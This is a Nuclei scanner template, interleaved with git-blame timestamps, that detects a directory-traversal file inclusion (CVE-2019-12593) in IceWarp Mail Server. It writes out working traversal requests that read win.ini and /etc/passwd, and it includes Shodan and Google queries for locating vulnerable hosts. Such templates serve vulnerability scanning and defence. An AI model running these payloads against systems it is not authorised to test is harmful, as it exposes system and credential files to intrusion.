2021-01-02 04:59:06 +00:00
id : CVE-2019-12593
2020-09-05 06:49:58 +00:00
info :
2022-06-17 16:23:53 +00:00
name : IceWarp Mail Server <=10.4.4 - Local File Inclusion
2020-09-05 06:49:58 +00:00
author : pikpikcu
2020-09-05 07:11:21 +00:00
severity : high
2022-06-20 17:31:28 +00:00
description : |
IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
2023-09-06 12:53:28 +00:00
remediation : |
Upgrade IceWarp Mail Server to a version higher than 10.4.4 or apply the vendor-provided patch to fix the LFI vulnerability.
2021-08-19 13:17:27 +00:00
reference :
- https://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt
2022-02-21 18:33:16 +00:00
- http://www.icewarp.com
2022-06-15 13:15:42 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-12593
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/153161/IceWarp-10.4.4-Local-File-Inclusion.html
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-12593
cwe-id : CWE-22
2023-10-16 10:55:14 +00:00
epss-score : 0.15747
2023-11-03 15:51:18 +00:00
epss-percentile : 0.95335
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:*
2021-09-16 15:54:33 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : icewarp
product : mail_server
2023-09-06 12:53:28 +00:00
shodan-query : title:"icewarp"
google-query : Powered By IceWarp 10.4.4
2023-07-12 11:56:50 +00:00
tags : packetstorm,cve,cve2019,lfi,icewarp
2020-09-05 06:49:58 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-09-05 06:49:58 +00:00
- method : GET
path :
- '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini'
- '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd'
matchers-condition : and
matchers :
- type : word
words :
- "[intl]"
2022-01-04 19:34:16 +00:00
- "root:x:0"
2022-06-15 13:15:42 +00:00
2022-06-20 17:31:28 +00:00
- type : status
status :
- 200
2023-11-05 22:23:39 +00:00
# digest: 4b0a00483046022100fa13db6e0431f92dd8f0d00d7d8020eedfa2f59d070c20dc51a0b03fe7edcbc8022100ac9e4554b5d47fe046124fb6a3885a291386ef6ee93e37504cf1e97eae73d6e0:922c64590222798bb761d5b6d8e72950